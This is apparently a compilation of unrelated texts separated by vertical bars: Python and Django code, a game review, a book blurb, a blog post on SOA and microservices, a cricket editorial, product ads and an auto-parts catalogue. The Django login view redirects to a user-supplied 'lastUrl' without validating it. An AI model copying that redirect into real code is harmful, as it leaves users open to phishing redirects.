assert np.allclose(np.mean(ps[ps > 0.0]), .5, atol=.05), "Bad avg"
def test_behave_learn():
prng = np.random.RandomState(SEED)
trials, acc, ps, prng = behave.behave.learn(N=1, k=5, prng=prng)
# dim check
assert trials.shape == acc.shape, "l off: trials and acc"
assert trials.shape == ps.shape, "l off: trials and ps"
# Check trials comp, then ps and acc avg
k = 3000
trials, acc, ps, prng = behave.behave.learn(N=1, k=k, prng=prng)
assert np.allclose(np.sum(trials), k), "k is off"
assert np.allclose(np.unique(trials), np.array([0, 1])), "N is off"
assert np.mean(ps[ps > 0.0]) > .5, "Bad avg"
|
Mario, Luigi and Bowser team up for a big adventure.
Now, those are words we wouldn’t have thought we’d type, had we not played Mario & Luigi: Superstar Saga on the Game Boy Advance back in 2003.
For once, the big green spiky mean dude isn’t the antagonist here, but it’s only because it suits him. You see, Cackletta has stolen Princess Peach’s voice, replacing it with explosives. Yep – she speaks, she drops word bombs. Real bombs. Bowser doesn’t want to kidnap her in this state, as her language may damage his lovely, lava-filled castle.
So, they join forces and head off after Cackletta and her henchthing, Fawful, to rescue Peach’s voice. This means visiting the neighbouring Beanbean Kingdom (which is, of course, right next to the Isis kingdom...) Will the Beanbeans help our intrepid heroes (and Bowser)? Or will they become has-beans?
It’s a big old turn-based RPG thing, but with massive smatterings of Mario lore that make it less po-faced. It’s also quite funny at times. From simple jumping upon the bonces of enemies to going full whirlwind right through them, you level up, get more powerful – you know the drill.
Then there’s the bonus game which unlocks once you’re a reasonable way into the main adventure. Running alongside the main story (but optional), Minion’s Quest: The Search for Bowser sees the Goombas trying to track down their boss and rescue him. Rocking a sort of Fire Emblem vibe, you equip units and go for baddie takedown.
|
# -*-coding: utf-8-*-
from sqlalchemy import (
Column,
Integer,
Date,
Numeric,
String,
Table,
ForeignKey,
)
from sqlalchemy.orm import relationship, backref
from ..models import (
DBSession,
Base
)
outgoing_cashflow = Table(
'outgoing_cashflow',
Base.metadata,
Column(
'outgoing_id',
Integer,
ForeignKey(
'outgoing.id',
ondelete='restrict',
onupdate='cascade',
name='fk_outgoing_id_outgoing_cashflow',
),
primary_key=True,
),
Column(
'cashflow_id',
Integer,
ForeignKey(
'cashflow.id',
ondelete='restrict',
onupdate='cascade',
name='fk_cashflow_id_outgoing_cashflow',
),
primary_key=True,
)
)
class Outgoing(Base):
__tablename__ = 'outgoing'
id = Column(
Integer,
autoincrement=True,
primary_key=True
)
date = Column(
Date,
nullable=False,
)
resource_id = Column(
Integer,
ForeignKey(
'resource.id',
name="fk_resource_id_outgoing",
ondelete='restrict',
onupdate='cascade',
),
nullable=False,
)
account_item_id = Column(
Integer,
ForeignKey(
'account_item.id',
name="fk_account_item_id_outgoing",
ondelete='restrict',
onupdate='cascade',
),
nullable=False,
)
subaccount_id = Column(
Integer,
ForeignKey(
'subaccount.id',
name="fk_subaccount_id_outgoing",
ondelete='restrict',
onupdate='cascade',
),
nullable=False,
)
sum = Column(
Numeric(16, 2),
nullable=False,
)
descr = Column(
String(length=255),
)
resource = relationship(
'Resource',
backref=backref(
'outgoing',
uselist=False,
cascade="all,delete"
),
foreign_keys=[resource_id],
cascade="all,delete",
uselist=False,
)
account_item = relationship(
'AccountItem',
backref=backref(
'outgoings',
uselist=True,
lazy="dynamic"
),
uselist=False,
)
subaccount = relationship(
'Subaccount',
backref=backref(
'outgoings',
uselist=True,
lazy="dynamic"
),
uselist=False,
)
cashflows = relationship(
'Cashflow',
secondary=outgoing_cashflow,
backref=backref(
'outgoing',
uselist=False,
),
cascade="all,delete",
uselist=True,
)
@classmethod
def get(cls, id):
if id is None:
return None
return DBSession.query(cls).get(id)
@classmethod
def by_resource_id(cls, resource_id):
if resource_id is None:
return None
return (
DBSession.query(cls).filter(cls.resource_id == resource_id).first()
)
def rollback(self):
cashflows = list(self.cashflows)
self.cashflows = []
DBSession.flush()
for cashflow in cashflows:
DBSession.delete(cashflow)
|
Avery Bloom, who's bookish, intense, and afraid of many things, particularly deep water, lives in New York City. Bett Devlin, who's fearless, outgoing, and loves all animals as well as the ocean, lives in California. What they have in common is that they are both twelve years old, and are both being raised by single, gay dads. When their dads fall in love, Bett and Avery are sent, against their will, to the same sleepaway camp. Their dads hope that they will find common ground and become friends -- and possibly, one day, even sisters. But things soon go off the rails for the girls (and for their dads too), and they find themselves on a summer adventure that neither of them could have predicted.
|
# Copyright 2021 The CLU Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MetricWriter for writing to TF summary files.
Only works in eager mode. Does not work for PyTorch code; please use
TorchTensorboardWriter instead.
"""
from typing import Any, Mapping, Optional
from clu.internal import utils
from clu.metric_writers import interface
import tensorflow as tf
from tensorboard.plugins.hparams import api as hparams_api
Array = interface.Array
Scalar = interface.Scalar
class SummaryWriter(interface.MetricWriter):
"""MetricWriter that writes TF summary files."""
def __init__(self, logdir: str):
super().__init__()
self._summary_writer = tf.summary.create_file_writer(logdir)
def write_scalars(self, step: int, scalars: Mapping[str, Scalar]):
with self._summary_writer.as_default():
for key, value in scalars.items():
tf.summary.scalar(key, value, step=step)
def write_images(self, step: int, images: Mapping[str, Array]):
with self._summary_writer.as_default():
for key, value in images.items():
tf.summary.image(key, value, step=step, max_outputs=value.shape[0])
def write_texts(self, step: int, texts: Mapping[str, str]):
with self._summary_writer.as_default():
for key, value in texts.items():
tf.summary.text(key, value, step=step)
def write_histograms(self,
step: int,
arrays: Mapping[str, Array],
num_buckets: Optional[Mapping[str, int]] = None):
with self._summary_writer.as_default():
for key, value in arrays.items():
buckets = None if num_buckets is None else num_buckets.get(key)
tf.summary.histogram(key, value, step=step, buckets=buckets)
def write_hparams(self, hparams: Mapping[str, Any]):
with self._summary_writer.as_default():
hparams_api.hparams(dict(utils.flatten_dict(hparams)))
def flush(self):
self._summary_writer.flush()
def close(self):
self._summary_writer.close()
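# A minimal usage sketch (assumes eager mode and a writable log directory;
# the path and tag below are illustrative, not from the source):
if __name__ == "__main__":
  writer = SummaryWriter(logdir="/tmp/summary_writer_demo")
  for step in range(3):
    # Stand-in scalar; a real program would log training metrics here.
    writer.write_scalars(step, {"train/loss": 1.0 / (step + 1)})
  writer.flush()
  writer.close()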
|
This is unsurprising, because it’s rooted in fact. For all of its other faults, SOA was a vision of enterprises that looks remarkably like what progressive organizations are building today with cloud native architectures composed of, among other things, microservices. Stripped to its core, SOA was the idea that architectures should be composed of services rather than monolithic applications.
Popular as that vision is today, however, SOA was from the start an uphill battle. It gained hype and currency, which in turn led inevitably to furious messaging and branding pivots, but even in an industry which tends towards the ephemeral, SOA's moment in the sun was, by the standards of the technologies that preceded it, comparatively brief.
If SOA and microservices have at least some common ground from a functional perspective, then, why was the former rejected and the latter embraced?
Many would point to size as the critical differentiator. Services as described by SOA were insufficiently granular, it’s been argued, and therefore difficult to build and harder to manage. Setting aside the obvious fact that this glosses over the management overhead associated with taking large services and breaking them up into large numbers of smaller alternatives, it also misses the far more critical distinction: SOA was primarily a vendor led phenomenon, microservices is by contrast largely being driven from the bottom up.
Given the success of platforms such as AWS, it’s difficult to make the argument that service driven platforms are not an effective way of building platforms that scale or that they’re not the dominant approach at present. But notably, service-based platforms are generally developer constructs at present. The SOA-driven world originally envisioned by large vendors, one in which services were built out upon a byzantine framework of complex (and frequently political) “standards” never came to pass for the simple reason that developers wanted no part of it.
To be sure, microservices has benefitted from the lessons learned by various SOA practitioners, and indeed the effort to popularize and socialize the latter term has simplified the adoption of the former. But the most important takeaway from SOA was arguably that developers would play a decisive – and in many cases, deciding – role in what would get used and what would not. Microservices are easier for them to develop than monolithic alternatives, and come without the vendor standards baggage of SOA, which is why even if it's still outpaced by SOA on a volume basis its trajectory looks a lot more positive.
Too often in this industry we look for explanations for success or failure based on technology or function, while the real causative factors are much simpler: do those who would make kings want to use it, or not?
IMHO, microservices are a subset of SOA.
SOA's intent is to provide reusable services to service consumers. From the service consumer's perspective, a microservice looks exactly the same.
So a microservice is fine-grained SOA with the ability to deploy and scale particular services independently (well, more independently). Over time that approach has yielded a great number of toolsets, frameworks, approaches and practices, but conceptually a microservice is still SOA.
Good article. As for me, one of the main issues with SOA is that it was built to serve the enterprise. If you want to do SOA, you need to use some vendor's SOA suite, from Oracle, etc. With microservices you can take various things, put them here and there, and it will work. For real SOA (SOA 2.0) you will more likely spend 2-3 weeks on setting up an ESB and some other things around it. Microservices, by contrast, allow you to skip some requirements and restrictions that must be guaranteed in SOA, such as SLAs. So I would say that microservices are a very light version of SOA, with various things that can be skipped or ignored by developers.
Hadn’t realised this before, but as soon as I read the title I realised the truth of it.
Though I’d like to suggest that advances in the simplicity of deployment and management which the cloud has brought have played a significant role in the adoption of microservices. In the past, spinning up a new “node” was a laborious task – with vendor lock-in, as you point out – so developers were forced into building monoliths. Now that barrier has been removed, it has enabled the microservice to become viable.
The forward SOA thinkers I worked with long ago thought in terms of primitives, not SOA-enabled APIs of enterprise apps.
SAP consultants have made a 10 year career out of simplifying SOA-enabled functions in SAP ERP.
I agree with you of the benefits of this being adopted by developers rather than application vendors.
I believe the problem with traditional SOA was the roadmap from ideation to industry implementation: bad innovation management. I believe change management nowadays is more mature than it was 10 years ago. Standards such as SOA-RA, and the implementations and commercialization by IBM, Oracle, and even WSO2 at the service level, met resistance in organizational change management. That is not happening with microservices, because they are lightweight and agile.
I totally agree. I think the view on developers and their importance for the company success changed massively over the last years, which is really great thing for everybody.
The current trend of microservices as shown in your graph very closely matches the left-hand side of the SOA hype curve. I guess time will tell when this hype curve flattens out and then plummets.
Hi Stephen, thank you for this article. In general I agree with your vision but, honestly, I have never seen any contradiction in viewing microservices as an evolution of SOA. Indeed, I think that such an idea is not completely wrong. If we just take into consideration the main principles which govern service oriented computing, there are not so many differences between SOA and microservices.
The real difference, as you point out, is that you can program microservices but you can only design SOA. This is a very big difference from an engineering point of view, and it is the reason why microservices were born from the bottom up while SOA is governed from the top down.
But the main point here is that both of them exploit the service oriented paradigm. So where is the real difference? In my personal opinion the main difference between them is cloud computing: the computational support. When SOA was conceived, cloud computing did not actually exist. SOA was born for integrating systems, which was a need for those companies which had to deal with complex systems populated by several vertical applications. This was the ground of SOA. Now there is the cloud, which is the new ground for service oriented applications. Computational resources are easy to access and the service oriented paradigm is shifting to microservices. Instead of limiting the usage of services by designing system integration flows, you can directly program applications using microservices. As you said, it is easier to develop a microservice than to follow all the SOA rules and develop a Web service or an orchestrator. Try to imagine this: take a DeLorean and go back to the beginning of 2000, when SOA was born. Are you so sure that introducing a microservice approach at that time was feasible? Even if it was possible in specific cases, there was not a solid ground where microservices could grow. Today you have this natural ground in the cloud. This is why they have become so popular, I think.
As in an Isaac Asimov novel, SOA just represents “Robbie”, the first robot 🙂 and microservices the next, evolved version!
Thanks for the article. I’d like to dive a bit deeper into your graphs. Can you tell me how you created the set of points used in the graphs. I’m not able to reproduce your results, but I’m sure it’s my naïve use of Google Trends.
@Don: Nothing fancy. Queried Google Trends for each term, maximized the timeline and downloaded the results as a CSV.
|
from django.db.models import Aggregate, Func
import six
class DateTrunc(Func):
"""
Accepts a single timestamp field or expression and returns that timestamp
truncated to the specified *precision*. This is useful for investigating
time series.
The *precision* named parameter can take:
* microseconds
* milliseconds
* second
* minute
* hour
* day
* week
* month
* quarter
* year
* decade
* century
* millennium
Usage example::
checkin = Checkin.objects.
annotate(day=DateTrunc('logged_at', 'day'),
hour=DateTrunc('logged_at', 'hour')).
get(pk=1)
assert checkin.logged_at == datetime(2015, 11, 1, 10, 45, 0)
assert checkin.day == datetime(2015, 11, 1, 0, 0, 0)
assert checkin.hour == datetime(2015, 11, 1, 10, 0, 0)
"""
function = "DATE_TRUNC"
template = "%(function)s('%(precision)s', %(expressions)s)"
def __init__(self, expression, precision, **extra):
if six.PY2:
super(DateTrunc, self).__init__(expression, precision=precision, **extra)
else:
super().__init__(expression, precision=precision, **extra)
class Extract(Func):
"""
Accepts a single timestamp or interval field or expression and returns
the specified *subfield* of that expression. This is useful for grouping
data.
The *subfield* named parameter can take:
* century
* day
* decade
* dow (day of week)
* doy (day of year)
* epoch (seconds since 1970-01-01 00:00:00 UTC)
* hour
* isodow
* isodoy
* isoyear
* microseconds
* millennium
* milliseconds
* minute
* month
* quarter
* second
* timezone
* timezone_hour
* timezone_minute
* week
* year
See `the Postgres documentation`_ for details about the subfields.
Usage example::
checkin = Checkin.objects.
annotate(day=Extract('logged_at', 'day'),
minute=Extract('logged_at', 'minute'),
quarter=Extract('logged_at', 'quarter')).
get(pk=1)
assert checkin.logged_at == datetime(2015, 11, 1, 10, 45, 0)
assert checkin.day == 1
assert checkin.minute == 45
assert checkin.quarter == 4
.. _the Postgres documentation: http://www.postgresql.org/docs/current/static/functions-datetime.html#FUNCTIONS-DATETIME-EXTRACT
"""
function = 'EXTRACT'
name = 'extract'
template = "%(function)s(%(subfield)s FROM %(expressions)s)"
def __init__(self, expression, subfield, **extra):
if six.PY2:
super(Extract, self).__init__(expression, subfield=subfield, **extra)
else:
super().__init__(expression, subfield=subfield, **extra)
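# Rendered SQL sketch, assumed from the templates above (identifier quoting
# depends on the database backend):
#   DateTrunc('logged_at', 'day')    -> DATE_TRUNC('day', "logged_at")
#   Extract('logged_at', 'quarter')  -> EXTRACT(quarter FROM "logged_at")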
|
MBOX attachment extractor software is specially designed to extract all attachments from MBOX files. The tool also allows you to remove MBOX file attachments, which helps avoid MBOX file corruption issues. This MBOX attachment extractor successfully supports various types of MBOX files, exported from Mozilla Thunderbird, Mac Mail, SeaMonkey, Google Takeout, etc. One of the best features of this product is that it lets you save extracted attachments to any desired location on your computer. MBOX attachment extractor software preserves all email items while extracting email messages from MBOX files, and it comes with a free demo edition that is helpful for evaluating the software. The software offers dual options to choose individual MBOX files as well as a folder containing MBOX files, so users can easily extract attachments from bulk MBOX files at once. MBOX attachment extractor is compatible with every 32-bit and 64-bit Windows operating system. It is two-in-one software that extracts all attachments from MBOX files and can remove MBOX file attachments as well.
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
from django.http import JsonResponse
from django.http import HttpResponseRedirect
from django.http import HttpResponse
from django.shortcuts import render
from django.views.decorators import csrf
# from django.contrib.auth.decorators import login_required
from tool.tools import createId
from reader.models import reader
from author.models import author
# connect to mysql and check
def loginReader(request):
lastUrl = ""
if "lastUrl" in request.POST:
lastUrl = request.POST['lastUrl']
context = {}
if "readerId" in request.session:
context['status'] = "success"
if lastUrl == "null":
# context['message'] = "/reader/readerIndex/"
return HttpResponseRedirect("/reader/index/")
elif lastUrl == "" or lastUrl is None:
context['status'] = "fail"
context['message'] = "錯誤的訪問"
return JsonResponse(context)
else:
# context['message'] = lastUrl
return HttpResponseRedirect(lastUrl)
# return JsonResponse(context)
if 'userName' not in request.POST or 'passwd' not in request.POST:  # reject if either credential is missing
context['status'] = "fail"
context['message'] = "請重載後輸入 Email 和密碼"
return JsonResponse(context)
# return render(request, 'reader/login.html')
userName = unicode(request.POST['userName'])
passwd = createId(96,request.POST['passwd'])
try:
readerObj = reader.objects.get(email=userName)
if passwd != readerObj.passwd:
context['status'] = "fail"
context['message'] = "密碼錯誤!請重新登錄!"
return JsonResponse(context)
# return render(request, 'reader/loginFail.html', {'message': u'密碼錯誤!請重新登錄!'})
if readerObj.status == "allowed":
request.session["readerId"] = readerObj.id
request.session["userName"] = readerObj.name
# check user is or not author and author's status
isAuthor = author.isExist(readerObj.id)
request.session["isAuthor"] = isAuthor
authorStatus = author.getStatus(readerObj.id)
if not isAuthor:
request.session["authorStatus"] = ""
context['status'] = "success"
if lastUrl == "null":
context['message'] = "/reader/index/"
else:
context['message'] = lastUrl
return JsonResponse(context)
authorId = author.getId(readerObj.id)
if authorId != "":
request.session["authorId"] = authorId
if authorStatus == "active":
request.session["authorStatus"] = "active"
else:
request.session["authorStatus"] = authorStatus
context['status'] = "success"
if lastUrl == "null":
context['message'] = "/reader/index/"
else:
context['message'] = lastUrl
return JsonResponse(context)
elif readerObj.status == "abuse":
context['status'] = "fail"
context['message'] = "您尚未驗證郵箱!請前往注冊郵箱驗證身份!"
return JsonResponse(context)
else :
context['status'] = "fail"
context['message'] = 'Your account status is abnormal and you cannot log in. Current status: ' + str(readerObj.status) + '. Please contact an administrator or register again.'
return JsonResponse(context)
except reader.DoesNotExist:
context['status'] = "fail"
context['message'] = 'User does not exist! Please log in again!'
return JsonResponse(context)
def logout(request):
# delete session
if "readerId" in request.session:
del request.session["readerId"] # if not exists, report error
del request.session["userName"] # if not exists, report error
del request.session["isAuthor"] # if not exists, report error
if 'authorId' in request.session:
del request.session["authorId"] # if not exists, report error
del request.session["authorStatus"] # if not exists, report error
request.session.flush()
return HttpResponseRedirect('/reader/login/')
else:
return HttpResponseRedirect('/reader/login/')
|
The Customer Support Center is within the Department of Facilities and Administrative Services.
You may also submit an online work order to report the issue.
In the event of an emergency, please contact extension 2353 during the time periods identified above. For all other times, the call should be directed to Campus Police at extension 2167.
|
import csv
class SimpleGraph:
def __init__(self):
self._spo = {}
self._pos = {}
self._osp = {}
def add(self, (sub, pred, obj)):
"""
Adds a triple to the graph.
"""
self._addToIndex(self._spo, sub, pred, obj)
self._addToIndex(self._pos, pred, obj, sub)
self._addToIndex(self._osp, obj, sub, pred)
def _addToIndex(self, index, a, b, c):
"""
Adds a triple to a specified index.
"""
if a not in index: index[a] = {b:set([c])}
else:
if b not in index[a]: index[a][b] = set([c])
else: index[a][b].add(c)
def remove(self, (sub, pred, obj)):
"""
Remove a triple pattern from the graph.
"""
triples = list(self.triples((sub, pred, obj)))
for (delSub, delPred, delObj) in triples:
self._removeFromIndex(self._spo, delSub, delPred, delObj)
self._removeFromIndex(self._pos, delPred, delObj, delSub)
self._removeFromIndex(self._osp, delObj, delSub, delPred)
def _removeFromIndex(self, index, a, b, c):
"""
Removes a triple from an index and clears up empty intermediate structures.
"""
try:
bs = index[a]
cset = bs[b]
cset.remove(c)
if len(cset) == 0: del bs[b]
if len(bs) == 0: del index[a]
# KeyErrors occur if a term was missing, which means that it wasn't a valid delete:
except KeyError:
pass
def triples(self, (sub, pred, obj)):
"""
Generator over the triple store.
Returns triples that match the given triple pattern.
"""
# check which terms are present in order to use the correct index:
try:
if sub != None:
if pred != None:
# sub pred obj
if obj != None:
if obj in self._spo[sub][pred]: yield (sub, pred, obj)
# sub pred None
else:
for retObj in self._spo[sub][pred]: yield (sub, pred, retObj)
else:
# sub None obj
if obj != None:
for retPred in self._osp[obj][sub]: yield (sub, retPred, obj)
# sub None None
else:
for retPred, objSet in self._spo[sub].items():
for retObj in objSet:
yield (sub, retPred, retObj)
else:
if pred != None:
# None pred obj
if obj != None:
for retSub in self._pos[pred][obj]:
yield (retSub, pred, obj)
# None pred None
else:
for retObj, subSet in self._pos[pred].items():
for retSub in subSet:
yield (retSub, pred, retObj)
else:
# None None obj
if obj != None:
for retSub, predSet in self._osp[obj].items():
for retPred in predSet:
yield (retSub, retPred, obj)
# None None None
else:
for retSub, predSet in self._spo.items():
for retPred, objSet in predSet.items():
for retObj in objSet:
yield (retSub, retPred, retObj)
# KeyErrors occur if a query term wasn't in the index, so we yield nothing:
except KeyError:
pass
def value(self, sub=None, pred=None, obj=None):
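        """
        Returns a single term from the first triple matching the pattern,
        filling in the wildcard position (checked in sub, pred, obj order),
        or None if nothing matches.
        """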
for retSub, retPred, retObj in self.triples((sub, pred, obj)):
if sub is None: return retSub
if pred is None: return retPred
if obj is None: return retObj
break
return None
def load(self, filename):
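        # expects a three-column CSV file of UTF-8 encoded subject, predicate, object rows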
f = open(filename, "rb")
reader = csv.reader(f)
for sub, pred, obj in reader:
sub = unicode(sub, "UTF-8")
pred = unicode(pred, "UTF-8")
obj = unicode(obj, "UTF-8")
self.add((sub, pred, obj))
f.close()
def save(self, filename):
f = open(filename, "wb")
writer = csv.writer(f)
for sub, pred, obj in self.triples((None, None, None)):
writer.writerow([sub.encode("UTF-8"), pred.encode("UTF-8"), obj.encode("UTF-8")])
f.close()
if __name__ == "__main__":
g = SimpleGraph()
g.add(("blade_runner", "name", "Blade Runner"))
g.add(("blade_runner", "name", "Blade Runner"))
g.add(("blade_runner", "release_date", "June 25, 1982"))
g.add(("blade_runner", "directed_by", "Ridley Scott"))
print list(g.triples((None, None, None)))
print list(g.triples(("blade_runner", None, None)))
print list(g.triples(("blade_runner", "name", None)))
print list(g.triples(("blade_runner", "name", "Blade Runner")))
print list(g.triples(("blade_runner", None, "Blade Runner")))
print list(g.triples((None, "name", "Blade Runner")))
print list(g.triples((None, None, "Blade Runner")))
print list(g.triples(("foo", "name", "Blade Runner")))
print list(g.triples(("blade_runner", "foo", "Blade Runner")))
print list(g.triples(("blade_runner", "name", "foo")))
|
Celebrated rivalries in cricket revolve, in the popular mind, around the Ashes or contests involving India and Pakistan. Both duels have the weight of history and are replete with anecdotes. But as Steve Smith’s men play and train under the Mumbai sun in their build-up to the four-match Test series at Pune, Bengaluru, Ranchi and Dharamsala, it is time to acknowledge the particular intensity that marks games involving India and Australia. It is a rivalry inferior to none, the folklore further amplified by riveting contests, especially in India. Be it at Kolkata’s Eden Gardens in 2001 when V.V.S. Laxman’s 281 helped India stage one of cricket’s most remarkable fight-backs, or at Chennai’s Chepauk back in 1986, when India and Australia played out only the second tie in cricketing history since 1877, the contests have ticked all the boxes: mighty individual performances, oscillating fortunes and a fifth-day cracker. When rival skippers Virat Kohli and Smith walk out for the toss at Pune’s Maharashtra Cricket Association Stadium on February 23, they will take this legacy forward. Helmed by young men — Kohli is 28, Smith 27 — both the Indian and Australian teams are emerging from the struggles of transition; this series is their big chance at asserting greatness.
India at home is a daunting opposition, the ‘Final Frontier’ for Australia as Steve Waugh called it. The home team is in fine form, with emphatic victories over the last year against visiting South Africa, New Zealand, England and Bangladesh sides. In its last 19 Tests, both home and away, India has remained undefeated, winning 15 of them. It is a validation of the squad’s evolution, underpinned by the consistency of its two leading players, Kohli and off-spinner R. Ashwin, and augmented by others rising to the opportunity when it has come — as Karun Nair did with his unbeaten 303 in the Chennai Test against England last December. A resolute captain and a calm coach, in Anil Kumble, have astutely guided the team. The odds favour India, and so does history. When Australia last toured India in 2012-13, it lost all four Tests. This season too, on balance, India appears to hold the aces. Australia may come in with a 3-0 triumph in home Tests against Pakistan, but before that, while hosting South Africa, it emerged second-best, and it lost three Tests in Sri Lanka. The last of these has evoked concern about the team’s adaptability to subcontinental conditions. Much will hinge on Smith, his aggressive opener David Warner and left-arm fast bowler Mitchell Starc, while Nathan Lyon is expected to shepherd an under-cooked spin unit. In 1986, Allan Border arrived with a bunch that was written off; yet they left with one tie and a drawn series. As history shows, surprise is the second skin of tussles involving India and Australia.
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
def remove_stale_content_types(apps, schema_editor):
# Remove known stale objects from django_content_type table.
ContentType = apps.get_model("contenttypes", "ContentType")
    # avoid shadowing the django.db.models import
    stale_models = {
        ("auth", "message"),
        ("dashboard_app", "launchpadbug"),
        ("dashboard_app", "imagecharttestrun"),
        ("dashboard_app", "testingeffort"),
        ("dashboard_app", "imageattribute")
    }
    for model in stale_models:
try:
ContentType.objects.get(app_label=model[0],
model=model[1]).delete()
except ContentType.DoesNotExist:
pass
def reverse_func(apps, schema_editor):
# Content types are automatically added by django.
pass
class Migration(migrations.Migration):
dependencies = [
('dashboard_app', '0014_auto_20150212_0604'),
]
operations = [
migrations.RunPython(
remove_stale_content_types,
reverse_func
),
]
|
Lightforce Driving Light Harness - 24 Volt Relay, Fuse, Switch, & Terminals.
Msd Zero-crossed Professional Racing Distributor.
Whether It's The Standard Rear Jeep Seats, Low-back Bucket Seats, Or The Versatile Fold-&-tumble Option For Additional Storage Space, Smittybilt Jeep Rear Seats Deliver The Same Lasting Comfort, Style, And Longevity That You've Come To Expect In All Smittybilt Products.
Beam's Industries Inc Retractable Lap Seat Belt By Beam's F0721-63773.
Keep Yourself Snug And Safe While Driving Or Trail Riding With These Quality Replacement Seat Belts. If Your Seat Belts Are Worn, Frayed Or Damaged, They Cannot Supply Adequate Protection For You Or Your Family. Our Seat Belts Meet Current Federal Motor Vehicle Safety Standards (FMVSS). All Belts Include Mounting Hardware. Each Sold Separately. Also Available In Black(01), Tan(04), Blue(05) And Gray(09).
Garage/shop Organizer Oil Bottle Holder.
Go Rhino Garage Organization Products Include A Variety Of Garage Storage Shelves And Racks. Easy To Install And Built With The High Quality, High Standards You Demand For Your Shop, Garage Or Enclosed Trailer At An Affordable Price!
Edelbrock Performer 440 Intake Manifold.
Edelbrock Performer Rpm Air-gap Dual Quad 350 C.i.d Crate Engine 9.0:2.
Bully Dog Triple Dog Gt Diesel Gauge Tuner 40420.
The Triple Dog Gt Is An All-in-one Downloader, Monitor And Tuning Device. The Gt Diesel Features Multiple Power Settings With The Ability To Adjust Drivetrain And User Settings. In Addition, The Gt Line Features All Of The Same Gauge/monitoring Functions As Well As The Advanced Driving Coach Software Aiding Drivers In Maximizing Their Fuel Economy.
Super Swamper Tsl Vampire Tire.
The Vampire Steps Away From All Other Atv Tires. The Super Swamper Tsl/vampire Is As Rugged As They Come. The Deep Lugs Give Longer Tread Life With The 43/32nds Of Tread Depth And Unsurpassed Forward, Reverse And Lateral Traction. The Vampires Are So Strong They Continue To Run Under Most Load Conditions Even While Punctured. As Long As The Vampire Does Not Become Unseated From The Rim The Tire Will Almost Always Get You Back. . . Even Without Air.
Kargo Master Top Mounting Brackets By Kargo Master 5072-1.
Safari Series Top Mounting Brackets. Required For Mounting Safari Racks To Vehicle. Fits Factory Fiberglass Hardtops Only. Brackets May Be Left On Top If Rack Is Removed.
Superlift 4 - 5 In. F.i.t. System With Bilstein Shocks.
Mean Green Mean Green High-Output Alternator 140 Amp Mg7128.
For Use With A 6 Cylinder Engine. This Alternator Is A Heavy-duty, High-Output Alternator Producing 140 Amps. Mean Green's Alternator Is The Perfect Complement For Dual Batteries. Inside, There's A State-of-the-art Voltage Regulator Designed To Protect Wiring And Ignition Systems. Made In The Usa; This High Output Alternator Has A One Year Unconditional Guarantee. If It Fails, Mean Green Will Replace It.
Procomp Suspension 8 Inch Stage II Lift Kit With Es9000 Shocks K4155b.
Pro Comp Is Driven By Genuine Off Road Enthusiasts. Pro Comp Suspension Products Reflect Customer-driven, Racing Influenced Technology And Engineering With A Focus On World-class Manufacturing Processes And Techniques. When It Comes To Your Vehicle's Handling, Look And Performance, We Know You Don't Accept Compromises And Neither Do We. From The Middle Of Downtown To The Middle Of Nowhere Pro Comp Will Get You There And Back.
Warn Steering Box Skid Plate.
Warn's Steering Box Skid Plate Has A Tight, Full Enclosure Design. 1/4 In. Clearance Between The Skid Plate And Steering Box Keeps Good Ground Clearance Over The Big Rocks. It Also Means Full Structural Rigidity When The Rocks Hit. Large Holes Allow For Debris Clearance Without Sacrificing Structural Support. Made From 3/16 In. Steel And Black Powder Coated. Fits 1997-2006 Jeep Tj Including Rubicon.
Magnaflow Direct Fit California Obdii Catalytic Converter.
Magnaflow Direct-fit Catalytic Converters By Car Sound Are Designed For Easy Bolt-on Installation For The Professional Installer. Each Is Designed To Match The Original Equipment Specifications. While The Majority Of The Direct-fit Catalytic Converter Products Do Not Require Welding, Cutting Or Bending, Limited Applications May Require Additional Welding For Optimal Installation. These Converters Are Designed To Meet All Of California's Strict Emissions Codes.
When Access Is The Issue, Choose The Genesis Hinged Tonneau From Lund. With A Hinged Cover To Allow Complete And Easy Access To Your Truck Bed, The Genesis Hinged Tonneau Has Heavy-duty Gas Struts For Quick, One-hand Opening And A Unique Slam Latch That Provides Instant Latching When Closing The Cover. Pre-marked Rails And Heavy-duty Clamps Ensure Quick, No-drill Installation.
Edelbrock C-26 Dual-quad Intake Manifold.
Maxxis Tires Maxxis Razr 4 Radial Tire M166425.
The Razr 4 Is The Perfect Tire For The Utility Quad Rider Looking For More Performance. Featuring An Aggressive Tread Pattern Based On That Of The Legendary Razr And Radial Construction This Tire Offers Both Performance And Comfort. And Its Lightweight Design Reduces Steering Effort Allowing For Quick Handling When You Need It.
Viair Stainless Steel Leader Hose W/ Check Valve.
Leader Hoses Allow Hot Air From Compressors To Cool While Being Delivered To A Tire Or Air Tank. Hoses With Check Valves Help To Protect The Head Of The Compressor From Damaging High Pressure Starting.
Warn Series 9 Round Top Industrial Winch.
Warn Industries' Industrial Division Has Introduced Its New Series 9 Round Top Hydraulic Winch, Which Has 9,000lb Pulling Capacity. This Winch Also Features A 5.0 Cubic-inch Motor, And An Air-operated Clutch For Convenient Free-spooling Of The Winch Drum. What Makes This Winch Unique Is The Wear Strips/skid Plate Located On The Top Of The Unit, Which Protects It From Damage When Pulling A Vehicle Over The Top Of The Winch. The Winch Is Equipped With A Heavy-duty Automatic Disc Brake For Safe, Dependable Operation; And A Hardened-steel, Two-stage Planetary Geartrain For Faster Line Speeds.
Edge Juice W/attitude Plug-in Module/in-cab Controller.
Edge's Premier Product Line, The Juice With Attitude, Controls Timing And Duration Of Injector Firing For Your Truck To Deliver Maximum Performance, Improved Driveability And Better Fuel Economy. Get On-the-fly Adjustability And Monitoring Capabilities At Your Fingertips. This Plug-in Module Is Easy To Install And Comes With Factory Style Connections.
Olympic 4x4 Products Double Side Bars 271-175.
